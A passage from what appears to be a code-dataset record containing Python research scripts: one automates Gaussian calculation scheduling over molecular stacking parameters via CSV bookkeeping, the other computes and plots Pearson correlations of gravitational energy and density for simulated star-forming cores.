'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\ndef listen(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n num_nodes = args.num_nodes\n isTest = args.isTest\n fixed_param_keys = ['A1', 'A2']\n opt_param_keys = ['a', 'b', 'theta', 'cx', 'cy', 'cz']\n auto_step2_csv = (\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.\n format(monomer_name))\n df_step2 = pd.read_csv(auto_step2_csv)\n auto_csv = os.path.join(auto_dir, 'step3-twist.csv')\n df_E = pd.read_csv(auto_csv)\n df_queue = df_E.loc[df_E['status'] == 'InProgress', ['machine_type',\n 'file_name', 'A1', 'A2', 'a', 'b', 'theta', 'cx', 'cy', 'cz']]\n machine_type_list = df_queue['machine_type'].values.tolist()\n len_queue = len(df_queue)\n maxnum_machine2 = 3\n for idx, row in zip(df_queue.index, df_queue.values):\n machine_type, file_name, A1, A2, a, b, theta, cx, cy, cz = row\n log_filepath = os.path.join(*[auto_dir, 'gaussian', file_name])\n if not os.path.exists(log_filepath):\n continue\n E_list = get_E(log_filepath)\n if len(E_list) != 5:\n continue\n else:\n len_queue -= 1\n machine_type_list.remove(machine_type)\n Ei0, Eip1, Eip2, Eit1, Eit2 = map(float, E_list)\n Eit3 = Eit2\n Eit4 = Eit1\n try:\n Ep, Et = df_step2[(df_step2['A1'] == A1) & (df_step2['A2'] ==\n A2) & (df_step2['theta'] == theta) & (df_step2['a'] ==\n a) & (df_step2['b'] == b)][['E_p', 'E_t']].values[0]\n except IndexError:\n inner_params_dict = {'A1': A1, 'A2': A2, 'a': a, 'b': b,\n 'theta': theta, 'cx': 0, 'cy': 0, 'cz': 0}\n inner_file_name = exec_gjf(auto_dir, monomer_name,\n inner_params_dict, machine_type, isInterlayer=False,\n isTest=isTest)\n time.sleep(200)\n is_inner_over = False\n while not is_inner_over:\n time.sleep(30)\n E_inner_list = get_E(inner_file_name)\n is_inner_over = len(E_inner_list) == 2\n Ep, Et = map(float, E_inner_list)\n df_newline = pd.Series({**inner_params_dict, 'E': 2 * Ep + \n 4 * Et, 'E_p': Ep, 'E_t': Et, 'machine_type':\n machine_type, 'status': 'Done', 'file_name':\n inner_file_name})\n df_step2 = df_step2.append(df_newline, ignore_index=True)\n df_step2.to_csv(auto_step2_csv, index=False)\n E = 4 * Et + 2 * Ep + 2 * (Ei0 + Eip1 + Eip2 + Eit1 + Eit2 +\n Eit3 + Eit4)\n df_E.loc[idx, ['E_p', 'E_t', 'E_i0', 'E_ip1', 'E_ip2', 'E_it1',\n 'E_it2', 'E_it3', 'E_it4', 'E', 'status']] = [Ep, Et, Ei0,\n Eip1, Eip2, Eit1, Eit2, Eit3, Eit4, E, 'Done']\n df_E.to_csv(auto_csv, index=False)\n break\n isAvailable = len_queue < num_nodes\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\n machine_type = 1 if machine2IsFull else 2\n if isAvailable:\n params_dict = get_params_dict(auto_dir, num_nodes, fixed_param_keys,\n opt_param_keys, monomer_name)\n if len(params_dict) != 0:\n alreadyCalculated = check_calc_status(auto_dir, params_dict)\n if not alreadyCalculated:\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict\n }, machine_type, isInterlayer=True, isTest=isTest)\n df_newline = pd.Series({**params_dict, 'E': 0.0, 'E_p': 0.0,\n 'E_t': 0.0, 'E_i0': 0.0, 'E_ip1': 0.0, 'E_ip2': 0.0,\n 'E_it1': 0.0, 'E_it2': 0.0, 'E_it3': 0.0, 'E_it4': 0.0,\n 'machine_type': machine_type, 'status': 'InProgress',\n 'file_name': file_name})\n df_E = df_E.append(df_newline, ignore_index=True)\n df_E.to_csv(auto_csv, index=False)\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_init_params_done = filter_df(df_init_params, {'status': 'Done'})\n isOver = True if len(df_init_params_done) == len(df_init_params) else False\n return isOver\n\n\ndef check_calc_status(auto_dir, params_dict):\n df_E = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n if len(df_E) == 0:\n return False\n df_E_filtered = filter_df(df_E, params_dict)\n df_E_filtered = df_E_filtered.reset_index(drop=True)\n try:\n status = get_values_from_df(df_E_filtered, 0, 'status')\n return status == 'Done'\n except KeyError:\n return False\n\n\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys,\n monomer_name):\n \"\"\"\n 前提:\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\n \"\"\"\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n df_init_params_inprogress = df_init_params[df_init_params['status'] ==\n 'InProgress']\n if len(df_init_params_inprogress) < num_nodes:\n df_init_params_notyet = df_init_params[df_init_params['status'] ==\n 'NotYet']\n for index in df_init_params_notyet.index:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n return params_dict\n for index in df_init_params.index:\n df_init_params = pd.read_csv(init_params_csv)\n init_params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n fixed_params_dict = df_init_params.loc[index, fixed_param_keys\n ].to_dict()\n isDone, opt_params_dict = get_opt_params_dict(df_cur,\n init_params_dict, fixed_params_dict, monomer_name)\n if isDone:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'Done')\n if np.max(df_init_params.index) < index + 1:\n status = 'Done'\n else:\n status = get_values_from_df(df_init_params, index + 1, 'status'\n )\n df_init_params.to_csv(init_params_csv, index=False)\n if status == 'NotYet':\n opt_params_dict = get_values_from_df(df_init_params, index +\n 1, opt_param_keys)\n df_init_params = update_value_in_df(df_init_params, index +\n 1, 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n return {**fixed_params_dict, **opt_params_dict}\n else:\n continue\n else:\n df_inprogress = filter_df(df_cur, {**fixed_params_dict, **\n opt_params_dict, 'status': 'InProgress'})\n if len(df_inprogress) >= 1:\n continue\n return {**fixed_params_dict, **opt_params_dict}\n return {}\n\n\ndef get_opt_params_dict(df_cur, init_params_dict, fixed_params_dict,\n monomer_name):\n df_val = filter_df(df_cur, fixed_params_dict)\n a_init_prev = init_params_dict['a']\n b_init_prev = init_params_dict['b']\n theta_init_prev = init_params_dict['theta']\n A1 = init_params_dict['A1']\n A2 = init_params_dict['A2']\n while True:\n E_list = []\n heri_list = []\n for a in [a_init_prev - 0.1, a_init_prev, a_init_prev + 0.1]:\n for b in [b_init_prev - 0.1, b_init_prev, b_init_prev + 0.1]:\n a = np.round(a, 1)\n b = np.round(b, 1)\n for theta in [theta_init_prev - 0.5, theta_init_prev, \n theta_init_prev + 0.5]:\n df_val_ab = df_val[(df_val['a'] == a) & (df_val['b'] ==\n b) & (df_val['theta'] == theta) & (df_val['A1'] ==\n A1) & (df_val['A2'] == A2) & (df_val['status'] ==\n 'Done')]\n if len(df_val_ab) == 0:\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a,\n b, theta)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1\n ), np.round(cz, 1)\n return False, {'a': a, 'b': b, 'theta': theta, 'cx':\n cx, 'cy': cy, 'cz': cz}\n heri_list.append([a, b, theta])\n E_list.append(df_val_ab['E'].values[0])\n a_init, b_init, theta_init = heri_list[np.argmin(np.array(E_list))]\n if (a_init == a_init_prev and b_init == b_init_prev and theta_init ==\n theta_init_prev):\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a_init, b_init,\n theta_init)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1), np.round(cz, 1)\n return True, {'a': a_init, 'b': b_init, 'theta': theta_init,\n 'cx': cx, 'cy': cy, 'cz': cz}\n else:\n a_init_prev = a_init\n b_init_prev = b_init\n theta_init_prev = theta_init\n\n\ndef get_values_from_df(df, index, key):\n return df.loc[index, key]\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\ndef filter_df(df, dict_filter):\n query = []\n for k, v in dict_filter.items():\n if type(v) == str:\n query.append('{} == \"{}\"'.format(k, v))\n else:\n query.append('{} == {}'.format(k, v))\n df_filtered = df.query(' and '.join(query))\n return df_filtered\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--init', action='store_true')\n parser.add_argument('--isTest', action='store_true')\n parser.add_argument('--auto-dir', type=str, help=\n 'path to dir which includes gaussian, gaussview and csv')\n parser.add_argument('--monomer-name', type=str, help='monomer name')\n parser.add_argument('--num-nodes', type=int, help='num nodes')\n args = parser.parse_args()\n if args.init:\n print('----initial process----')\n init_process(args)\n print('----main process----')\n main_process(args)\n print('----finish process----')\n",
"step-5": "import os\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nfrom tqdm import tqdm\r\nsys.path.append(os.path.join(os.environ['HOME'],'Working/interaction/'))\r\nfrom src.make import exec_gjf\r\nfrom src.vdw import vdw_R, get_c_vec_vdw\r\nfrom src.utils import get_E\r\nimport argparse\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport scipy.spatial.distance as distance\r\nimport random\r\n\r\ndef init_process(args):\r\n auto_dir = args.auto_dir\r\n monomer_name = args.monomer_name\r\n \r\n os.makedirs(os.path.join(auto_dir,'gaussian'), exist_ok=True)\r\n os.makedirs(os.path.join(auto_dir,'gaussview'), exist_ok=True)\r\n\r\n def get_init_para_csv(auto_dir,monomer_name):\r\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\r\n df = pd.read_csv('/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'.format(monomer_name))\r\n# df = df[(df[\"A2\"]==30)&(df[\"A1\"]<=0)&(df[\"A1\"]>=-10)&(df[\"theta\"]>45)]\r\n df = df[(df[\"A2\"]==32)&(df[\"A1\"]<=0)&(df[\"A1\"]>=-20)&(df[\"theta\"]>45)]\r\n \r\n inner_zip = df[['a','b','theta','A1','A2']].values\r\n print(inner_zip)\r\n init_para_list = []\r\n for a,b,theta,A1,A2 in tqdm(inner_zip):\r\n c = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)\r\n init_para_list.append([np.round(a,1),np.round(b,1),theta,A1,A2,np.round(c[0],1),np.round(c[1],1),np.round(c[2],1),'NotYet'])\r\n \r\n df_init_params = pd.DataFrame(np.array(init_para_list),columns = ['a','b','theta','A1','A2','cx','cy','cz','status'])\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n get_init_para_csv(auto_dir,monomer_name)\r\n \r\n auto_csv_path = os.path.join(auto_dir,'step3-twist.csv')\r\n if not os.path.exists(auto_csv_path): \r\n df_E = pd.DataFrame(columns = ['a','b','theta','A1','A2','cx','cy','cz','E','E_p','E_t','machine_type','status','file_name'])\r\n else:\r\n df_E = pd.read_csv(auto_csv_path)\r\n df_E = df_E[df_E['status']!='InProgress']\r\n df_E.to_csv(auto_csv_path,index=False)\r\n\r\n df_init=pd.read_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'))\r\n df_init['status']='NotYet'\r\n df_init.to_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'),index=False)\r\n\r\ndef main_process(args):\r\n os.chdir(os.path.join(args.auto_dir,'gaussian'))\r\n isOver = False\r\n while not(isOver):\r\n #check\r\n isOver = listen(args)\r\n time.sleep(1)\r\n\r\ndef listen(args):\r\n auto_dir = args.auto_dir\r\n monomer_name = args.monomer_name\r\n num_nodes = args.num_nodes\r\n isTest = args.isTest\r\n fixed_param_keys = ['A1','A2']\r\n opt_param_keys = ['a','b','theta','cx','cy','cz']\r\n\r\n auto_step2_csv = '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.format(monomer_name)\r\n df_step2 = pd.read_csv(auto_step2_csv)\r\n \r\n auto_csv = os.path.join(auto_dir,'step3-twist.csv')\r\n df_E = pd.read_csv(auto_csv)\r\n df_queue = df_E.loc[df_E['status']=='InProgress',['machine_type','file_name','A1','A2','a','b','theta','cx','cy','cz']]\r\n machine_type_list = df_queue['machine_type'].values.tolist()\r\n len_queue = len(df_queue)\r\n maxnum_machine2 = 3#int(num_nodes/2)\r\n \r\n for idx,row in zip(df_queue.index,df_queue.values):\r\n machine_type,file_name,A1,A2,a,b,theta,cx,cy,cz = row\r\n log_filepath = os.path.join(*[auto_dir,'gaussian',file_name])\r\n if not(os.path.exists(log_filepath)):#logファイルが生成される直前だとまずいので\r\n continue\r\n E_list=get_E(log_filepath)\r\n if len(E_list)!=5:\r\n continue\r\n else:\r\n len_queue-=1;machine_type_list.remove(machine_type)\r\n Ei0,Eip1,Eip2,Eit1,Eit2=map(float,E_list)\r\n Eit3 = Eit2; Eit4 = Eit1\r\n try:\r\n Ep, Et = df_step2[(df_step2['A1']==A1)&(df_step2['A2']==A2)&(df_step2['theta']==theta)&(df_step2['a']==a)&(df_step2['b']==b)][['E_p','E_t']].values[0]\r\n except IndexError:\r\n inner_params_dict = {\"A1\":A1,\"A2\":A2,\"a\":a,\"b\":b,\"theta\":theta,'cx':0,'cy':0,'cz':0}\r\n inner_file_name = exec_gjf(auto_dir, monomer_name, inner_params_dict, machine_type,isInterlayer=False,isTest=isTest)\r\n time.sleep(200)#1:40で1計算終わる\r\n is_inner_over = False\r\n while not(is_inner_over):\r\n time.sleep(30)#1:40で1計算終わる\r\n E_inner_list=get_E(inner_file_name)\r\n is_inner_over = len(E_inner_list)==2\r\n Ep, Et=map(float,E_inner_list)\r\n df_newline = pd.Series({**inner_params_dict,'E':2*Ep+4*Et,'E_p':Ep,'E_t':Et,'machine_type':machine_type,'status':'Done','file_name':inner_file_name})\r\n df_step2=df_step2.append(df_newline,ignore_index=True)\r\n df_step2.to_csv(auto_step2_csv,index=False)\r\n \r\n E = 4*Et + 2*Ep + 2*(Ei0 + Eip1+ Eip2 + Eit1 + Eit2 + Eit3 + Eit4)\r\n df_E.loc[idx, ['E_p','E_t','E_i0','E_ip1','E_ip2','E_it1','E_it2','E_it3','E_it4','E','status']] = [Ep,Et,Ei0,Eip1,Eip2,Eit1,Eit2,Eit3,Eit4,E,'Done']\r\n df_E.to_csv(auto_csv,index=False)\r\n break#2つ同時に計算終わったりしたらまずいので一個で切る\r\n isAvailable = len_queue < num_nodes \r\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\r\n machine_type = 1 if machine2IsFull else 2\r\n if isAvailable:\r\n params_dict = get_params_dict(auto_dir,num_nodes, fixed_param_keys, opt_param_keys, monomer_name)\r\n if len(params_dict)!=0:#終わりがまだ見えないなら\r\n alreadyCalculated = check_calc_status(auto_dir,params_dict)\r\n if not(alreadyCalculated):\r\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict}, machine_type,isInterlayer=True,isTest=isTest)\r\n df_newline = pd.Series({**params_dict,'E':0.,'E_p':0.,'E_t':0.,'E_i0':0.,'E_ip1':0.,'E_ip2':0.,'E_it1':0.,'E_it2':0.,'E_it3':0.,'E_it4':0.,'machine_type':machine_type,'status':'InProgress','file_name':file_name})\r\n df_E=df_E.append(df_newline,ignore_index=True)\r\n df_E.to_csv(auto_csv,index=False)\r\n \r\n init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_init_params_done = filter_df(df_init_params,{'status':'Done'})\r\n isOver = True if len(df_init_params_done)==len(df_init_params) else False\r\n return isOver\r\n\r\ndef check_calc_status(auto_dir,params_dict):\r\n df_E= pd.read_csv(os.path.join(auto_dir,'step3-twist.csv'))\r\n if len(df_E)==0:\r\n return False\r\n df_E_filtered = filter_df(df_E, params_dict)\r\n df_E_filtered = df_E_filtered.reset_index(drop=True)\r\n try:\r\n status = get_values_from_df(df_E_filtered,0,'status')\r\n return status=='Done'\r\n except KeyError:\r\n return False\r\n\r\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys, monomer_name):\r\n \"\"\"\r\n 前提:\r\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\r\n \"\"\"\r\n init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\r\n df_init_params_inprogress = df_init_params[df_init_params['status']=='InProgress']\r\n \r\n #最初の立ち上がり時\r\n if len(df_init_params_inprogress) < num_nodes:\r\n df_init_params_notyet = df_init_params[df_init_params['status']=='NotYet']\r\n for index in df_init_params_notyet.index:\r\n df_init_params = update_value_in_df(df_init_params,index,'status','InProgress')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n return params_dict\r\n for index in df_init_params.index:\r\n df_init_params = pd.read_csv(init_params_csv)\r\n init_params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n fixed_params_dict = df_init_params.loc[index,fixed_param_keys].to_dict()\r\n isDone, opt_params_dict = get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name)\r\n if isDone:\r\n # df_init_paramsのstatusをupdate\r\n df_init_params = update_value_in_df(df_init_params,index,'status','Done')\r\n if np.max(df_init_params.index) < index+1:\r\n status = 'Done'\r\n else:\r\n status = get_values_from_df(df_init_params,index+1,'status')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n if status=='NotYet': \r\n opt_params_dict = get_values_from_df(df_init_params,index+1,opt_param_keys)\r\n df_init_params = update_value_in_df(df_init_params,index+1,'status','InProgress')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n return {**fixed_params_dict,**opt_params_dict}\r\n else:\r\n continue\r\n\r\n else:\r\n df_inprogress = filter_df(df_cur, {**fixed_params_dict,**opt_params_dict,'status':'InProgress'})\r\n if len(df_inprogress)>=1:\r\n continue\r\n return {**fixed_params_dict,**opt_params_dict}\r\n return {}\r\n \r\ndef get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name):\r\n df_val = filter_df(df_cur, fixed_params_dict)\r\n a_init_prev = init_params_dict['a']; b_init_prev = init_params_dict['b']; theta_init_prev = init_params_dict['theta']\r\n A1 = init_params_dict['A1']; A2 = init_params_dict['A2']\r\n \r\n while True:\r\n E_list=[];heri_list=[]\r\n for a in [a_init_prev-0.1,a_init_prev,a_init_prev+0.1]:\r\n for b in [b_init_prev-0.1,b_init_prev,b_init_prev+0.1]:\r\n a = np.round(a,1);b = np.round(b,1)\r\n for theta in [theta_init_prev-0.5,theta_init_prev,theta_init_prev+0.5]:\r\n df_val_ab = df_val[\r\n (df_val['a']==a)&(df_val['b']==b)&(df_val['theta']==theta)&\r\n (df_val['A1']==A1)&(df_val['A2']==A2)&\r\n (df_val['status']=='Done')\r\n ]\r\n if len(df_val_ab)==0:\r\n cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)\r\n cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)\r\n return False,{'a':a,'b':b,'theta':theta, \"cx\":cx, \"cy\":cy, \"cz\":cz }\r\n heri_list.append([a,b,theta]);E_list.append(df_val_ab['E'].values[0])\r\n a_init,b_init,theta_init = heri_list[np.argmin(np.array(E_list))]\r\n if a_init==a_init_prev and b_init==b_init_prev and theta_init==theta_init_prev:\r\n cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a_init,b_init,theta_init)\r\n cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)\r\n return True,{'a':a_init,'b':b_init, 'theta':theta_init, \"cx\":cx, \"cy\":cy, \"cz\":cz }\r\n else:\r\n a_init_prev=a_init;b_init_prev=b_init;theta_init_prev=theta_init\r\n \r\ndef get_values_from_df(df,index,key):\r\n return df.loc[index,key]\r\n\r\ndef update_value_in_df(df,index,key,value):\r\n df.loc[index,key]=value\r\n return df\r\n\r\ndef filter_df(df, dict_filter):\r\n query = []\r\n for k, v in dict_filter.items():\r\n if type(v)==str:\r\n query.append('{} == \"{}\"'.format(k,v))\r\n else:\r\n query.append('{} == {}'.format(k,v))\r\n df_filtered = df.query(' and '.join(query))\r\n return df_filtered\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument('--init',action='store_true')\r\n parser.add_argument('--isTest',action='store_true')\r\n parser.add_argument('--auto-dir',type=str,help='path to dir which includes gaussian, gaussview and csv')\r\n parser.add_argument('--monomer-name',type=str,help='monomer name')\r\n parser.add_argument('--num-nodes',type=int,help='num nodes')\r\n \r\n args = parser.parse_args()\r\n\r\n if args.init:\r\n print(\"----initial process----\")\r\n init_process(args)\r\n \r\n print(\"----main process----\")\r\n main_process(args)\r\n print(\"----finish process----\")\r\n ",
"step-ids": [
3,
7,
9,
10,
12
]
}
|
[
3,
7,
9,
10,
12
] |
from starter2 import *
from collections import defaultdict
import scipy
import colors
import hair_dryer
reload(hair_dryer)
import three_loopers_u500 as TL
import movie_frames
def GE_pearson(this_looper,core_list=None):
if core_list is None:
core_list = np.unique(this_looper.tr.core_ids)
name = this_looper.sim_name
thtr=this_looper.tr
mask = movie_frames.quantized_mask(this_looper).flatten()
times=thtr.times[mask]+0 #the zero makes a copy
times.shape=times.size,1
times=times/colors.tff
G = colors.G
#gx = thtr.track_dict['grav_x']
#gy = thtr.track_dict['grav_y']
#gz = thtr.track_dict['grav_z']
#GE2 = -1/(8*np.pi)*(gx*gx+gy*gy+gz*gz)
#ge_min=GE2.min()
#ge_max=GE2.max()
PearsonR = np.zeros([len(core_list), len(times)])
PearsonP = np.zeros([len(core_list), len(times)])
PearsonRho = np.zeros([len(core_list), len(times)])
PeakRho = np.zeros([len(core_list), len(times)])
for nc, core_id in enumerate(core_list):
print('GE pearson %s %d'%(name,core_id))
ms = trackage.mini_scrubber(thtr,core_id, do_velocity=False)
#ms.particle_pos(core_id)
if ms.nparticles < 1000:
sl=slice(None)
c=[0.5]*4
else:
sl = slice(None,None,10)
#c=[0,0,0,0.1]
c=[0.1]*4
rho = ms.density[sl]
rho = rho[:,mask]
PeakRho[nc,:]=rho.max(axis=0)
gx = thtr.c([core_id],'grav_x')[sl][:,mask]
gy = thtr.c([core_id],'grav_y')[sl][:,mask]
gz = thtr.c([core_id],'grav_z')[sl][:,mask]
GE2 = 1/(8*np.pi*G)*(gx*gx+gy*gy+gz*gz)
RRR = ms.r[sl][:,mask]
for n in range(GE2.shape[1]):
the_x=np.log(RRR[:,n])
the_y=np.log(GE2[:,n])
#the_y=rho[:,n]
r,p=scipy.stats.pearsonr(the_x,the_y)
PearsonR[nc,n]=r
PearsonP[nc,n]=p
the_y=np.log(rho[:,n])
r,p=scipy.stats.pearsonr(the_x,the_y)
PearsonRho[nc,n]=r
if 0:
fig,ax=plt.subplots(1,2)
ax[0].plot(times,PearsonR)
#ax[0].boxplot(PearsonR)
#ax[1].boxplot(PearsonRho)
fig.savefig('plots_to_sort/phi_box_%s.png'%name)
return {'PR':PearsonR, 'PP':PearsonP, 'Prho':PearsonRho, 'T':times, 'PeakRho':PeakRho}
if 0:
fig,ax=plt.subplots(1,1)
ax.plot(times , GE2, c=c, linewidth=0.1)
axbonk(ax,xlabel=r'$t/t_{ff}$', ylabel=r'$(\nabla \phi)^2/8 pi G$',yscale='log', ylim=[ge_min,ge_max])
ax2=ax.twinx()
c=[1.0,0.1,0.1,0.1]
ax2.plot(times , rho, c=c, linewidth=0.1)
axbonk(ax2,xlabel=r'$t/t_{ff}$', ylabel=r'$\rho$',yscale='log')
outname='plots_to_sort/%s_GE_t_c%04d.png'%(this_looper.sim_name,core_id)
fig.savefig(outname)
print(outname)
sims=['u501', 'u502','u503']
if 'stuff' not in dir():
stuff={}
for sim in sims:
core_list = np.unique(TL.loops[sim].tr.core_ids)
#core_list=core_list[:10]
stuff[sim] = GE_pearson(TL.loops[sim],core_list=core_list)
if 1:
for sim in stuff:
fig,ax=plt.subplots(1,1)
T = stuff[sim]['T']
rho=stuff[sim]['PeakRho']
Rphi=stuff[sim]['PR']
ax.plot(Rphi.transpose() ,rho.transpose(),c=[0.1]*4)
axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')
fig.savefig('plots_to_sort/peak_rho_pearson_phi%s.png'%sim)
if 1:
for sim in stuff:
fig,ax=plt.subplots(1,1)
T = stuff[sim]['T']
rho=stuff[sim]['PeakRho']
ax.plot(T,rho.transpose(),c=[0.1]*4)
axbonk(ax,xlabel='time',ylabel='rho max', yscale='log')
fig.savefig('plots_to_sort/peak_rho_%s.png'%sim)
if 0:
for sim in stuff:
fig,ax=plt.subplots(1,1)
c=[0.1]*4
#ax.plot( stuff[sim]['T'], stuff[sim]['PR'].transpose(),c=c)
#ax.scatter( stuff[sim]['Prho'].transpose(), stuff[sim]['PR'].transpose(),c=c)
XX,YY= stuff[sim]['Prho'].flatten(), stuff[sim]['PR'].flatten()
ok = (~np.isnan(XX))*(~np.isnan(YY))
XX=XX[ok]
YY=YY[ok]
xbins = np.linspace( XX.min(), XX.max(), 64)
ybins = np.linspace( YY.min(), YY.max(), 64)
hist, xb, yb = np.histogram2d(XX,YY, bins=[xbins,ybins])
import pcolormesh_helper as pch
pch.helper(hist,xb,yb,ax=ax)
fig.savefig('plots_to_sort/RGE_Rrho_%s.png'%sim)
if 1:
for sim in stuff:
fig,ax=plt.subplots(1,2)
Rphi = stuff[sim]['PR']
ax[0].boxplot( Rphi )
ax[0].plot( Rphi.mean(axis=0))
ax[1].boxplot( stuff[sim]['Prho'])
axbonk(ax[0],xlabel='frame',ylabel='Rgrad phi')
axbonk(ax[1],xlabel='frame',ylabel='R rho')
fig.savefig('plots_to_sort/Boxes_%s.png'%(sim))
if 0:
from scipy.ndimage import gaussian_filter
fig,ax=plt.subplots()
for sim in stuff:
Rphi = stuff[sim]['PR']
Rrho = stuff[sim]['Prho']
ax.plot( gaussian_filter(Rphi.mean(axis=0),1), colors.color[sim] +'--')
ax.plot( Rrho.mean(axis=0), colors.color[sim])
axbonk(ax,xlabel='frame',ylabel='Rgrad phi')
fig.savefig('plots_to_sort/MeanR_%s.png'%(sim))
|
normal
|
{
"blob_id": "0762c5bec2d796bb7888e3de45e29fb20f88f491",
"index": 392,
"step-1": "<mask token>\n\n\ndef GE_pearson(this_looper, core_list=None):\n if core_list is None:\n core_list = np.unique(this_looper.tr.core_ids)\n name = this_looper.sim_name\n thtr = this_looper.tr\n mask = movie_frames.quantized_mask(this_looper).flatten()\n times = thtr.times[mask] + 0\n times.shape = times.size, 1\n times = times / colors.tff\n G = colors.G\n PearsonR = np.zeros([len(core_list), len(times)])\n PearsonP = np.zeros([len(core_list), len(times)])\n PearsonRho = np.zeros([len(core_list), len(times)])\n PeakRho = np.zeros([len(core_list), len(times)])\n for nc, core_id in enumerate(core_list):\n print('GE pearson %s %d' % (name, core_id))\n ms = trackage.mini_scrubber(thtr, core_id, do_velocity=False)\n if ms.nparticles < 1000:\n sl = slice(None)\n c = [0.5] * 4\n else:\n sl = slice(None, None, 10)\n c = [0.1] * 4\n rho = ms.density[sl]\n rho = rho[:, mask]\n PeakRho[nc, :] = rho.max(axis=0)\n gx = thtr.c([core_id], 'grav_x')[sl][:, mask]\n gy = thtr.c([core_id], 'grav_y')[sl][:, mask]\n gz = thtr.c([core_id], 'grav_z')[sl][:, mask]\n GE2 = 1 / (8 * np.pi * G) * (gx * gx + gy * gy + gz * gz)\n RRR = ms.r[sl][:, mask]\n for n in range(GE2.shape[1]):\n the_x = np.log(RRR[:, n])\n the_y = np.log(GE2[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonR[nc, n] = r\n PearsonP[nc, n] = p\n the_y = np.log(rho[:, n])\n r, p = scipy.stats.pearsonr(the_x, the_y)\n PearsonRho[nc, n] = r\n if 0:\n fig, ax = plt.subplots(1, 2)\n ax[0].plot(times, PearsonR)\n fig.savefig('plots_to_sort/phi_box_%s.png' % name)\n return {'PR': PearsonR, 'PP': PearsonP, 'Prho': PearsonRho, 'T': times,\n 'PeakRho': PeakRho}\n if 0:\n fig, ax = plt.subplots(1, 1)\n ax.plot(times, GE2, c=c, linewidth=0.1)\n axbonk(ax, xlabel='$t/t_{ff}$', ylabel='$(\\\\nabla \\\\phi)^2/8 pi G$',\n yscale='log', ylim=[ge_min, ge_max])\n ax2 = ax.twinx()\n c = [1.0, 0.1, 0.1, 0.1]\n ax2.plot(times, rho, c=c, linewidth=0.1)\n axbonk(ax2, xlabel='$t/t_{ff}$', ylabel='$\\\\rho$', yscale='log')\n outname = 'plots_to_sort/%s_GE_t_c%04d.png' % (this_looper.sim_name,\n core_id)\n fig.savefig(outname)\n print(outname)\n\n\n<mask token>\n",
